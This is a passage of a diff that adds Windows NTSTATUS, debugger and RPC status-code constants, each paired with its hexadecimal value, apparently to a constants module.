+STATUS_EVENTLOG_CANT_START = 0xC000018F
+STATUS_TRUST_FAILURE = 0xC0000190
+STATUS_MUTANT_LIMIT_EXCEEDED = 0xC0000191
+STATUS_NETLOGON_NOT_STARTED = 0xC0000192
+STATUS_ACCOUNT_EXPIRED = 0xC0000193
+STATUS_POSSIBLE_DEADLOCK = 0xC0000194
+STATUS_NETWORK_CREDENTIAL_CONFLICT = 0xC0000195
+STATUS_REMOTE_SESSION_LIMIT = 0xC0000196
+STATUS_EVENTLOG_FILE_CHANGED = 0xC0000197
+STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0xC0000198
+STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0xC0000199
+STATUS_NOLOGON_SERVER_TRUST_ACCOUNT = 0xC000019A
+STATUS_DOMAIN_TRUST_INCONSISTENT = 0xC000019B
+STATUS_FS_DRIVER_REQUIRED = 0xC000019C
+STATUS_IMAGE_ALREADY_LOADED_AS_DLL = 0xC000019D
+STATUS_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0xC000019E
+STATUS_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0xC000019F
+STATUS_SECURITY_STREAM_IS_INCONSISTENT = 0xC00001A0
+STATUS_INVALID_LOCK_RANGE = 0xC00001A1
+STATUS_INVALID_ACE_CONDITION = 0xC00001A2
+STATUS_IMAGE_SUBSYSTEM_NOT_PRESENT = 0xC00001A3
+STATUS_NOTIFICATION_GUID_ALREADY_DEFINED = 0xC00001A4
+STATUS_NETWORK_OPEN_RESTRICTION = 0xC0000201
+STATUS_NO_USER_SESSION_KEY = 0xC0000202
+STATUS_USER_SESSION_DELETED = 0xC0000203
+STATUS_RESOURCE_LANG_NOT_FOUND = 0xC0000204
+STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
+STATUS_INVALID_BUFFER_SIZE = 0xC0000206
+STATUS_INVALID_ADDRESS_COMPONENT = 0xC0000207
+STATUS_INVALID_ADDRESS_WILDCARD = 0xC0000208
+STATUS_TOO_MANY_ADDRESSES = 0xC0000209
+STATUS_ADDRESS_ALREADY_EXISTS = 0xC000020A
+STATUS_ADDRESS_CLOSED = 0xC000020B
+STATUS_CONNECTION_DISCONNECTED = 0xC000020C
+STATUS_CONNECTION_RESET = 0xC000020D
+STATUS_TOO_MANY_NODES = 0xC000020E
+STATUS_TRANSACTION_ABORTED = 0xC000020F
+STATUS_TRANSACTION_TIMED_OUT = 0xC0000210
+STATUS_TRANSACTION_NO_RELEASE = 0xC0000211
+STATUS_TRANSACTION_NO_MATCH = 0xC0000212
+STATUS_TRANSACTION_RESPONDED = 0xC0000213
+STATUS_TRANSACTION_INVALID_ID = 0xC0000214
+STATUS_TRANSACTION_INVALID_TYPE = 0xC0000215
+STATUS_NOT_SERVER_SESSION = 0xC0000216
+STATUS_NOT_CLIENT_SESSION = 0xC0000217
+STATUS_CANNOT_LOAD_REGISTRY_FILE = 0xC0000218
+STATUS_DEBUG_ATTACH_FAILED = 0xC0000219
+STATUS_SYSTEM_PROCESS_TERMINATED = 0xC000021A
+STATUS_DATA_NOT_ACCEPTED = 0xC000021B
+STATUS_NO_BROWSER_SERVERS_FOUND = 0xC000021C
+STATUS_VDM_HARD_ERROR = 0xC000021D
+STATUS_DRIVER_CANCEL_TIMEOUT = 0xC000021E
+STATUS_REPLY_MESSAGE_MISMATCH = 0xC000021F
+STATUS_MAPPED_ALIGNMENT = 0xC0000220
+STATUS_IMAGE_CHECKSUM_MISMATCH = 0xC0000221
+STATUS_LOST_WRITEBEHIND_DATA = 0xC0000222
+STATUS_CLIENT_SERVER_PARAMETERS_INVALID = 0xC0000223
+STATUS_PASSWORD_MUST_CHANGE = 0xC0000224
+STATUS_NOT_FOUND = 0xC0000225
+STATUS_NOT_TINY_STREAM = 0xC0000226
+STATUS_RECOVERY_FAILURE = 0xC0000227
+STATUS_STACK_OVERFLOW_READ = 0xC0000228
+STATUS_FAIL_CHECK = 0xC0000229
+STATUS_DUPLICATE_OBJECTID = 0xC000022A
+STATUS_OBJECTID_EXISTS = 0xC000022B
+STATUS_CONVERT_TO_LARGE = 0xC000022C
+STATUS_RETRY = 0xC000022D
+STATUS_FOUND_OUT_OF_SCOPE = 0xC000022E
+STATUS_ALLOCATE_BUCKET = 0xC000022F
+STATUS_PROPSET_NOT_FOUND = 0xC0000230
+STATUS_MARSHALL_OVERFLOW = 0xC0000231
+STATUS_INVALID_VARIANT = 0xC0000232
+STATUS_DOMAIN_CONTROLLER_NOT_FOUND = 0xC0000233
+STATUS_ACCOUNT_LOCKED_OUT = 0xC0000234
+STATUS_HANDLE_NOT_CLOSABLE = 0xC0000235
+STATUS_CONNECTION_REFUSED = 0xC0000236
+STATUS_GRACEFUL_DISCONNECT = 0xC0000237
+STATUS_ADDRESS_ALREADY_ASSOCIATED = 0xC0000238
+STATUS_ADDRESS_NOT_ASSOCIATED = 0xC0000239
+STATUS_CONNECTION_INVALID = 0xC000023A
+STATUS_CONNECTION_ACTIVE = 0xC000023B
+STATUS_NETWORK_UNREACHABLE = 0xC000023C
+STATUS_HOST_UNREACHABLE = 0xC000023D
+STATUS_PROTOCOL_UNREACHABLE = 0xC000023E
+STATUS_PORT_UNREACHABLE = 0xC000023F
+STATUS_REQUEST_ABORTED = 0xC0000240
+STATUS_CONNECTION_ABORTED = 0xC0000241
+STATUS_BAD_COMPRESSION_BUFFER = 0xC0000242
+STATUS_USER_MAPPED_FILE = 0xC0000243
+STATUS_AUDIT_FAILED = 0xC0000244
+STATUS_TIMER_RESOLUTION_NOT_SET = 0xC0000245
+STATUS_CONNECTION_COUNT_LIMIT = 0xC0000246
+STATUS_LOGIN_TIME_RESTRICTION = 0xC0000247
+STATUS_LOGIN_WKSTA_RESTRICTION = 0xC0000248
+STATUS_IMAGE_MP_UP_MISMATCH = 0xC0000249
+STATUS_INSUFFICIENT_LOGON_INFO = 0xC0000250
+STATUS_BAD_DLL_ENTRYPOINT = 0xC0000251
+STATUS_BAD_SERVICE_ENTRYPOINT = 0xC0000252
+STATUS_LPC_REPLY_LOST = 0xC0000253
+STATUS_IP_ADDRESS_CONFLICT1 = 0xC0000254
+STATUS_IP_ADDRESS_CONFLICT2 = 0xC0000255
+STATUS_REGISTRY_QUOTA_LIMIT = 0xC0000256
+STATUS_PATH_NOT_COVERED = 0xC0000257
+STATUS_NO_CALLBACK_ACTIVE = 0xC0000258
+STATUS_LICENSE_QUOTA_EXCEEDED = 0xC0000259
+STATUS_PWD_TOO_SHORT = 0xC000025A
+STATUS_PWD_TOO_RECENT = 0xC000025B
+STATUS_PWD_HISTORY_CONFLICT = 0xC000025C
+STATUS_PLUGPLAY_NO_DEVICE = 0xC000025E
+STATUS_UNSUPPORTED_COMPRESSION = 0xC000025F
+STATUS_INVALID_HW_PROFILE = 0xC0000260
+STATUS_INVALID_PLUGPLAY_DEVICE_PATH = 0xC0000261
+STATUS_DRIVER_ORDINAL_NOT_FOUND = 0xC0000262
+STATUS_DRIVER_ENTRYPOINT_NOT_FOUND = 0xC0000263
+STATUS_RESOURCE_NOT_OWNED = 0xC0000264
+STATUS_TOO_MANY_LINKS = 0xC0000265
+STATUS_QUOTA_LIST_INCONSISTENT = 0xC0000266
+STATUS_FILE_IS_OFFLINE = 0xC0000267
+STATUS_EVALUATION_EXPIRATION = 0xC0000268
+STATUS_ILLEGAL_DLL_RELOCATION = 0xC0000269
+STATUS_LICENSE_VIOLATION = 0xC000026A
+STATUS_DLL_INIT_FAILED_LOGOFF = 0xC000026B
+STATUS_DRIVER_UNABLE_TO_LOAD = 0xC000026C
+STATUS_DFS_UNAVAILABLE = 0xC000026D
+STATUS_VOLUME_DISMOUNTED = 0xC000026E
+STATUS_WX86_INTERNAL_ERROR = 0xC000026F
+STATUS_WX86_FLOAT_STACK_CHECK = 0xC0000270
+STATUS_VALIDATE_CONTINUE = 0xC0000271
+STATUS_NO_MATCH = 0xC0000272
+STATUS_NO_MORE_MATCHES = 0xC0000273
+STATUS_NOT_A_REPARSE_POINT = 0xC0000275
+STATUS_IO_REPARSE_TAG_INVALID = 0xC0000276
+STATUS_IO_REPARSE_TAG_MISMATCH = 0xC0000277
+STATUS_IO_REPARSE_DATA_INVALID = 0xC0000278
+STATUS_IO_REPARSE_TAG_NOT_HANDLED = 0xC0000279
+STATUS_REPARSE_POINT_NOT_RESOLVED = 0xC0000280
+STATUS_DIRECTORY_IS_A_REPARSE_POINT = 0xC0000281
+STATUS_RANGE_LIST_CONFLICT = 0xC0000282
+STATUS_SOURCE_ELEMENT_EMPTY = 0xC0000283
+STATUS_DESTINATION_ELEMENT_FULL = 0xC0000284
+STATUS_ILLEGAL_ELEMENT_ADDRESS = 0xC0000285
+STATUS_MAGAZINE_NOT_PRESENT = 0xC0000286
+STATUS_REINITIALIZATION_NEEDED = 0xC0000287
+STATUS_ENCRYPTION_FAILED = 0xC000028A
+STATUS_DECRYPTION_FAILED = 0xC000028B
+STATUS_RANGE_NOT_FOUND = 0xC000028C
+STATUS_NO_RECOVERY_POLICY = 0xC000028D
+STATUS_NO_EFS = 0xC000028E
+STATUS_WRONG_EFS = 0xC000028F
+STATUS_NO_USER_KEYS = 0xC0000290
+STATUS_FILE_NOT_ENCRYPTED = 0xC0000291
+STATUS_NOT_EXPORT_FORMAT = 0xC0000292
+STATUS_FILE_ENCRYPTED = 0xC0000293
+STATUS_WMI_GUID_NOT_FOUND = 0xC0000295
+STATUS_WMI_INSTANCE_NOT_FOUND = 0xC0000296
+STATUS_WMI_ITEMID_NOT_FOUND = 0xC0000297
+STATUS_WMI_TRY_AGAIN = 0xC0000298
+STATUS_SHARED_POLICY = 0xC0000299
+STATUS_POLICY_OBJECT_NOT_FOUND = 0xC000029A
+STATUS_POLICY_ONLY_IN_DS = 0xC000029B
+STATUS_VOLUME_NOT_UPGRADED = 0xC000029C
+STATUS_REMOTE_STORAGE_NOT_ACTIVE = 0xC000029D
+STATUS_REMOTE_STORAGE_MEDIA_ERROR = 0xC000029E
+STATUS_NO_TRACKING_SERVICE = 0xC000029F
+STATUS_SERVER_SID_MISMATCH = 0xC00002A0
+STATUS_DS_NO_ATTRIBUTE_OR_VALUE = 0xC00002A1
+STATUS_DS_INVALID_ATTRIBUTE_SYNTAX = 0xC00002A2
+STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED = 0xC00002A3
+STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0xC00002A4
+STATUS_DS_BUSY = 0xC00002A5
+STATUS_DS_UNAVAILABLE = 0xC00002A6
+STATUS_DS_NO_RIDS_ALLOCATED = 0xC00002A7
+STATUS_DS_NO_MORE_RIDS = 0xC00002A8
+STATUS_DS_INCORRECT_ROLE_OWNER = 0xC00002A9
+STATUS_DS_RIDMGR_INIT_ERROR = 0xC00002AA
+STATUS_DS_OBJ_CLASS_VIOLATION = 0xC00002AB
+STATUS_DS_CANT_ON_NON_LEAF = 0xC00002AC
+STATUS_DS_CANT_ON_RDN = 0xC00002AD
+STATUS_DS_CANT_MOD_OBJ_CLASS = 0xC00002AE
+STATUS_DS_CROSS_DOM_MOVE_FAILED = 0xC00002AF
+STATUS_DS_GC_NOT_AVAILABLE = 0xC00002B0
+STATUS_DIRECTORY_SERVICE_REQUIRED = 0xC00002B1
+STATUS_REPARSE_ATTRIBUTE_CONFLICT = 0xC00002B2
+STATUS_CANT_ENABLE_DENY_ONLY = 0xC00002B3
+STATUS_FLOAT_MULTIPLE_FAULTS = 0xC00002B4
+STATUS_FLOAT_MULTIPLE_TRAPS = 0xC00002B5
+STATUS_DEVICE_REMOVED = 0xC00002B6
+STATUS_JOURNAL_DELETE_IN_PROGRESS = 0xC00002B7
+STATUS_JOURNAL_NOT_ACTIVE = 0xC00002B8
+STATUS_NOINTERFACE = 0xC00002B9
+STATUS_DS_ADMIN_LIMIT_EXCEEDED = 0xC00002C1
+STATUS_DRIVER_FAILED_SLEEP = 0xC00002C2
+STATUS_MUTUAL_AUTHENTICATION_FAILED = 0xC00002C3
+STATUS_CORRUPT_SYSTEM_FILE = 0xC00002C4
+STATUS_DATATYPE_MISALIGNMENT_ERROR = 0xC00002C5
+STATUS_WMI_READ_ONLY = 0xC00002C6
+STATUS_WMI_SET_FAILURE = 0xC00002C7
+STATUS_COMMITMENT_MINIMUM = 0xC00002C8
+STATUS_REG_NAT_CONSUMPTION = 0xC00002C9
+STATUS_TRANSPORT_FULL = 0xC00002CA
+STATUS_DS_SAM_INIT_FAILURE = 0xC00002CB
+STATUS_ONLY_IF_CONNECTED = 0xC00002CC
+STATUS_DS_SENSITIVE_GROUP_VIOLATION = 0xC00002CD
+STATUS_PNP_RESTART_ENUMERATION = 0xC00002CE
+STATUS_JOURNAL_ENTRY_DELETED = 0xC00002CF
+STATUS_DS_CANT_MOD_PRIMARYGROUPID = 0xC00002D0
+STATUS_SYSTEM_IMAGE_BAD_SIGNATURE = 0xC00002D1
+STATUS_PNP_REBOOT_REQUIRED = 0xC00002D2
+STATUS_POWER_STATE_INVALID = 0xC00002D3
+STATUS_DS_INVALID_GROUP_TYPE = 0xC00002D4
+STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0xC00002D5
+STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0xC00002D6
+STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0xC00002D7
+STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0xC00002D8
+STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0xC00002D9
+STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0xC00002DA
+STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0xC00002DB
+STATUS_DS_HAVE_PRIMARY_MEMBERS = 0xC00002DC
+STATUS_WMI_NOT_SUPPORTED = 0xC00002DD
+STATUS_INSUFFICIENT_POWER = 0xC00002DE
+STATUS_SAM_NEED_BOOTKEY_PASSWORD = 0xC00002DF
+STATUS_SAM_NEED_BOOTKEY_FLOPPY = 0xC00002E0
+STATUS_DS_CANT_START = 0xC00002E1
+STATUS_DS_INIT_FAILURE = 0xC00002E2
+STATUS_SAM_INIT_FAILURE = 0xC00002E3
+STATUS_DS_GC_REQUIRED = 0xC00002E4
+STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0xC00002E5
+STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0xC00002E6
+STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0xC00002E7
+STATUS_CURRENT_DOMAIN_NOT_ALLOWED = 0xC00002E9
+STATUS_CANNOT_MAKE = 0xC00002EA
+STATUS_SYSTEM_SHUTDOWN = 0xC00002EB
+STATUS_DS_INIT_FAILURE_CONSOLE = 0xC00002EC
+STATUS_DS_SAM_INIT_FAILURE_CONSOLE = 0xC00002ED
+STATUS_UNFINISHED_CONTEXT_DELETED = 0xC00002EE
+STATUS_NO_TGT_REPLY = 0xC00002EF
+STATUS_OBJECTID_NOT_FOUND = 0xC00002F0
+STATUS_NO_IP_ADDRESSES = 0xC00002F1
+STATUS_WRONG_CREDENTIAL_HANDLE = 0xC00002F2
+STATUS_CRYPTO_SYSTEM_INVALID = 0xC00002F3
+STATUS_MAX_REFERRALS_EXCEEDED = 0xC00002F4
+STATUS_MUST_BE_KDC = 0xC00002F5
+STATUS_STRONG_CRYPTO_NOT_SUPPORTED = 0xC00002F6
+STATUS_TOO_MANY_PRINCIPALS = 0xC00002F7
+STATUS_NO_PA_DATA = 0xC00002F8
+STATUS_PKINIT_NAME_MISMATCH = 0xC00002F9
+STATUS_SMARTCARD_LOGON_REQUIRED = 0xC00002FA
+STATUS_KDC_INVALID_REQUEST = 0xC00002FB
+STATUS_KDC_UNABLE_TO_REFER = 0xC00002FC
+STATUS_KDC_UNKNOWN_ETYPE = 0xC00002FD
+STATUS_SHUTDOWN_IN_PROGRESS = 0xC00002FE
+STATUS_SERVER_SHUTDOWN_IN_PROGRESS = 0xC00002FF
+STATUS_NOT_SUPPORTED_ON_SBS = 0xC0000300
+STATUS_WMI_GUID_DISCONNECTED = 0xC0000301
+STATUS_WMI_ALREADY_DISABLED = 0xC0000302
+STATUS_WMI_ALREADY_ENABLED = 0xC0000303
+STATUS_MFT_TOO_FRAGMENTED = 0xC0000304
+STATUS_COPY_PROTECTION_FAILURE = 0xC0000305
+STATUS_CSS_AUTHENTICATION_FAILURE = 0xC0000306
+STATUS_CSS_KEY_NOT_PRESENT = 0xC0000307
+STATUS_CSS_KEY_NOT_ESTABLISHED = 0xC0000308
+STATUS_CSS_SCRAMBLED_SECTOR = 0xC0000309
+STATUS_CSS_REGION_MISMATCH = 0xC000030A
+STATUS_CSS_RESETS_EXHAUSTED = 0xC000030B
+STATUS_PKINIT_FAILURE = 0xC0000320
+STATUS_SMARTCARD_SUBSYSTEM_FAILURE = 0xC0000321
+STATUS_NO_KERB_KEY = 0xC0000322
+STATUS_HOST_DOWN = 0xC0000350
+STATUS_UNSUPPORTED_PREAUTH = 0xC0000351
+STATUS_EFS_ALG_BLOB_TOO_BIG = 0xC0000352
+STATUS_PORT_NOT_SET = 0xC0000353
+STATUS_DEBUGGER_INACTIVE = 0xC0000354
+STATUS_DS_VERSION_CHECK_FAILURE = 0xC0000355
+STATUS_AUDITING_DISABLED = 0xC0000356
+STATUS_PRENT4_MACHINE_ACCOUNT = 0xC0000357
+STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0xC0000358
+STATUS_INVALID_IMAGE_WIN_32 = 0xC0000359
+STATUS_INVALID_IMAGE_WIN_64 = 0xC000035A
+STATUS_BAD_BINDINGS = 0xC000035B
+STATUS_NETWORK_SESSION_EXPIRED = 0xC000035C
+STATUS_APPHELP_BLOCK = 0xC000035D
+STATUS_ALL_SIDS_FILTERED = 0xC000035E
+STATUS_NOT_SAFE_MODE_DRIVER = 0xC000035F
+STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT = 0xC0000361
+STATUS_ACCESS_DISABLED_BY_POLICY_PATH = 0xC0000362
+STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER = 0xC0000363
+STATUS_ACCESS_DISABLED_BY_POLICY_OTHER = 0xC0000364
+STATUS_FAILED_DRIVER_ENTRY = 0xC0000365
+STATUS_DEVICE_ENUMERATION_ERROR = 0xC0000366
+STATUS_MOUNT_POINT_NOT_RESOLVED = 0xC0000368
+STATUS_INVALID_DEVICE_OBJECT_PARAMETER = 0xC0000369
+STATUS_MCA_OCCURED = 0xC000036A
+STATUS_DRIVER_BLOCKED_CRITICAL = 0xC000036B
+STATUS_DRIVER_BLOCKED = 0xC000036C
+STATUS_DRIVER_DATABASE_ERROR = 0xC000036D
+STATUS_SYSTEM_HIVE_TOO_LARGE = 0xC000036E
+STATUS_INVALID_IMPORT_OF_NON_DLL = 0xC000036F
+STATUS_NO_SECRETS = 0xC0000371
+STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0xC0000372
+STATUS_FAILED_STACK_SWITCH = 0xC0000373
+STATUS_HEAP_CORRUPTION = 0xC0000374
+STATUS_SMARTCARD_WRONG_PIN = 0xC0000380
+STATUS_SMARTCARD_CARD_BLOCKED = 0xC0000381
+STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED = 0xC0000382
+STATUS_SMARTCARD_NO_CARD = 0xC0000383
+STATUS_SMARTCARD_NO_KEY_CONTAINER = 0xC0000384
+STATUS_SMARTCARD_NO_CERTIFICATE = 0xC0000385
+STATUS_SMARTCARD_NO_KEYSET = 0xC0000386
+STATUS_SMARTCARD_IO_ERROR = 0xC0000387
+STATUS_DOWNGRADE_DETECTED = 0xC0000388
+STATUS_SMARTCARD_CERT_REVOKED = 0xC0000389
+STATUS_ISSUING_CA_UNTRUSTED = 0xC000038A
+STATUS_REVOCATION_OFFLINE_C = 0xC000038B
+STATUS_PKINIT_CLIENT_FAILURE = 0xC000038C
+STATUS_SMARTCARD_CERT_EXPIRED = 0xC000038D
+STATUS_DRIVER_FAILED_PRIOR_UNLOAD = 0xC000038E
+STATUS_SMARTCARD_SILENT_CONTEXT = 0xC000038F
+STATUS_PER_USER_TRUST_QUOTA_EXCEEDED = 0xC0000401
+STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED = 0xC0000402
+STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0xC0000403
+STATUS_DS_NAME_NOT_UNIQUE = 0xC0000404
+STATUS_DS_DUPLICATE_ID_FOUND = 0xC0000405
+STATUS_DS_GROUP_CONVERSION_ERROR = 0xC0000406
+STATUS_VOLSNAP_PREPARE_HIBERNATE = 0xC0000407
+STATUS_USER2USER_REQUIRED = 0xC0000408
+STATUS_STACK_BUFFER_OVERRUN = 0xC0000409
+STATUS_NO_S4U_PROT_SUPPORT = 0xC000040A
+STATUS_CROSSREALM_DELEGATION_FAILURE = 0xC000040B
+STATUS_REVOCATION_OFFLINE_KDC = 0xC000040C
+STATUS_ISSUING_CA_UNTRUSTED_KDC = 0xC000040D
+STATUS_KDC_CERT_EXPIRED = 0xC000040E
+STATUS_KDC_CERT_REVOKED = 0xC000040F
+STATUS_PARAMETER_QUOTA_EXCEEDED = 0xC0000410
+STATUS_HIBERNATION_FAILURE = 0xC0000411
+STATUS_DELAY_LOAD_FAILED = 0xC0000412
+STATUS_AUTHENTICATION_FIREWALL_FAILED = 0xC0000413
+STATUS_VDM_DISALLOWED = 0xC0000414
+STATUS_HUNG_DISPLAY_DRIVER_THREAD = 0xC0000415
+STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0xC0000416
+STATUS_INVALID_CRUNTIME_PARAMETER = 0xC0000417
+STATUS_NTLM_BLOCKED = 0xC0000418
+STATUS_DS_SRC_SID_EXISTS_IN_FOREST = 0xC0000419
+STATUS_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0xC000041A
+STATUS_DS_FLAT_NAME_EXISTS_IN_FOREST = 0xC000041B
+STATUS_INVALID_USER_PRINCIPAL_NAME = 0xC000041C
+STATUS_ASSERTION_FAILURE = 0xC0000420
+STATUS_VERIFIER_STOP = 0xC0000421
+STATUS_CALLBACK_POP_STACK = 0xC0000423
+STATUS_INCOMPATIBLE_DRIVER_BLOCKED = 0xC0000424
+STATUS_HIVE_UNLOADED = 0xC0000425
+STATUS_COMPRESSION_DISABLED = 0xC0000426
+STATUS_FILE_SYSTEM_LIMITATION = 0xC0000427
+STATUS_INVALID_IMAGE_HASH = 0xC0000428
+STATUS_NOT_CAPABLE = 0xC0000429
+STATUS_REQUEST_OUT_OF_SEQUENCE = 0xC000042A
+STATUS_IMPLEMENTATION_LIMIT = 0xC000042B
+STATUS_ELEVATION_REQUIRED = 0xC000042C
+STATUS_NO_SECURITY_CONTEXT = 0xC000042D
+STATUS_PKU2U_CERT_FAILURE = 0xC000042E
+STATUS_BEYOND_VDL = 0xC0000432
+STATUS_ENCOUNTERED_WRITE_IN_PROGRESS = 0xC0000433
+STATUS_PTE_CHANGED = 0xC0000434
+STATUS_PURGE_FAILED = 0xC0000435
+STATUS_CRED_REQUIRES_CONFIRMATION = 0xC0000440
+STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0xC0000441
+STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0xC0000442
+STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0xC0000443
+STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0xC0000444
+STATUS_CS_ENCRYPTION_FILE_NOT_CSE = 0xC0000445
+STATUS_INVALID_LABEL = 0xC0000446
+STATUS_DRIVER_PROCESS_TERMINATED = 0xC0000450
+STATUS_AMBIGUOUS_SYSTEM_DEVICE = 0xC0000451
+STATUS_SYSTEM_DEVICE_NOT_FOUND = 0xC0000452
+STATUS_RESTART_BOOT_APPLICATION = 0xC0000453
+STATUS_INSUFFICIENT_NVRAM_RESOURCES = 0xC0000454
+STATUS_INVALID_TASK_NAME = 0xC0000500
+STATUS_INVALID_TASK_INDEX = 0xC0000501
+STATUS_THREAD_ALREADY_IN_TASK = 0xC0000502
+STATUS_CALLBACK_BYPASS = 0xC0000503
+STATUS_FAIL_FAST_EXCEPTION = 0xC0000602
+STATUS_IMAGE_CERT_REVOKED = 0xC0000603
+STATUS_PORT_CLOSED = 0xC0000700
+STATUS_MESSAGE_LOST = 0xC0000701
+STATUS_INVALID_MESSAGE = 0xC0000702
+STATUS_REQUEST_CANCELED = 0xC0000703
+STATUS_RECURSIVE_DISPATCH = 0xC0000704
+STATUS_LPC_RECEIVE_BUFFER_EXPECTED = 0xC0000705
+STATUS_LPC_INVALID_CONNECTION_USAGE = 0xC0000706
+STATUS_LPC_REQUESTS_NOT_ALLOWED = 0xC0000707
+STATUS_RESOURCE_IN_USE = 0xC0000708
+STATUS_HARDWARE_MEMORY_ERROR = 0xC0000709
+STATUS_THREADPOOL_HANDLE_EXCEPTION = 0xC000070A
+STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED = 0xC000070B
+STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED = 0xC000070C
+STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED = 0xC000070D
+STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED = 0xC000070E
+STATUS_THREADPOOL_RELEASED_DURING_OPERATION = 0xC000070F
+STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING = 0xC0000710
+STATUS_APC_RETURNED_WHILE_IMPERSONATING = 0xC0000711
+STATUS_PROCESS_IS_PROTECTED = 0xC0000712
+STATUS_MCA_EXCEPTION = 0xC0000713
+STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE = 0xC0000714
+STATUS_SYMLINK_CLASS_DISABLED = 0xC0000715
+STATUS_INVALID_IDN_NORMALIZATION = 0xC0000716
+STATUS_NO_UNICODE_TRANSLATION = 0xC0000717
+STATUS_ALREADY_REGISTERED = 0xC0000718
+STATUS_CONTEXT_MISMATCH = 0xC0000719
+STATUS_PORT_ALREADY_HAS_COMPLETION_LIST = 0xC000071A
+STATUS_CALLBACK_RETURNED_THREAD_PRIORITY = 0xC000071B
+STATUS_INVALID_THREAD = 0xC000071C
+STATUS_CALLBACK_RETURNED_TRANSACTION = 0xC000071D
+STATUS_CALLBACK_RETURNED_LDR_LOCK = 0xC000071E
+STATUS_CALLBACK_RETURNED_LANG = 0xC000071F
+STATUS_CALLBACK_RETURNED_PRI_BACK = 0xC0000720
+STATUS_DISK_REPAIR_DISABLED = 0xC0000800
+STATUS_DS_DOMAIN_RENAME_IN_PROGRESS = 0xC0000801
+STATUS_DISK_QUOTA_EXCEEDED = 0xC0000802
+STATUS_CONTENT_BLOCKED = 0xC0000804
+STATUS_BAD_CLUSTERS = 0xC0000805
+STATUS_VOLUME_DIRTY = 0xC0000806
+STATUS_FILE_CHECKED_OUT = 0xC0000901
+STATUS_CHECKOUT_REQUIRED = 0xC0000902
+STATUS_BAD_FILE_TYPE = 0xC0000903
+STATUS_FILE_TOO_LARGE = 0xC0000904
+STATUS_FORMS_AUTH_REQUIRED = 0xC0000905
+STATUS_VIRUS_INFECTED = 0xC0000906
+STATUS_VIRUS_DELETED = 0xC0000907
+STATUS_BAD_MCFG_TABLE = 0xC0000908
+STATUS_CANNOT_BREAK_OPLOCK = 0xC0000909
+STATUS_WOW_ASSERTION = 0xC0009898
+STATUS_INVALID_SIGNATURE = 0xC000A000
+STATUS_HMAC_NOT_SUPPORTED = 0xC000A001
+STATUS_IPSEC_QUEUE_OVERFLOW = 0xC000A010
+STATUS_ND_QUEUE_OVERFLOW = 0xC000A011
+STATUS_HOPLIMIT_EXCEEDED = 0xC000A012
+STATUS_PROTOCOL_NOT_SUPPORTED = 0xC000A013
+STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0xC000A080
+STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0xC000A081
+STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0xC000A082
+STATUS_XML_PARSE_ERROR = 0xC000A083
+STATUS_XMLDSIG_ERROR = 0xC000A084
+STATUS_WRONG_COMPARTMENT = 0xC000A085
+STATUS_AUTHIP_FAILURE = 0xC000A086
+STATUS_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0xC000A087
+STATUS_DS_OID_NOT_FOUND = 0xC000A088
+STATUS_HASH_NOT_SUPPORTED = 0xC000A100
+STATUS_HASH_NOT_PRESENT = 0xC000A101
+DBG_NO_STATE_CHANGE = 0xC0010001
+DBG_APP_NOT_IDLE = 0xC0010002
+RPC_NT_INVALID_STRING_BINDING = 0xC0020001
+RPC_NT_WRONG_KIND_OF_BINDING = 0xC0020002
+RPC_NT_INVALID_BINDING = 0xC0020003
+RPC_NT_PROTSEQ_NOT_SUPPORTED = 0xC0020004
+RPC_NT_INVALID_RPC_PROTSEQ = 0xC0020005
+RPC_NT_INVALID_STRING_UUID = 0xC0020006
+RPC_NT_INVALID_ENDPOINT_FORMAT = 0xC0020007
+RPC_NT_INVALID_NET_ADDR = 0xC0020008
+RPC_NT_NO_ENDPOINT_FOUND = 0xC0020009
+RPC_NT_INVALID_TIMEOUT = 0xC002000A
+RPC_NT_OBJECT_NOT_FOUND = 0xC002000B
+RPC_NT_ALREADY_REGISTERED = 0xC002000C
+RPC_NT_TYPE_ALREADY_REGISTERED = 0xC002000D
+RPC_NT_ALREADY_LISTENING = 0xC002000E
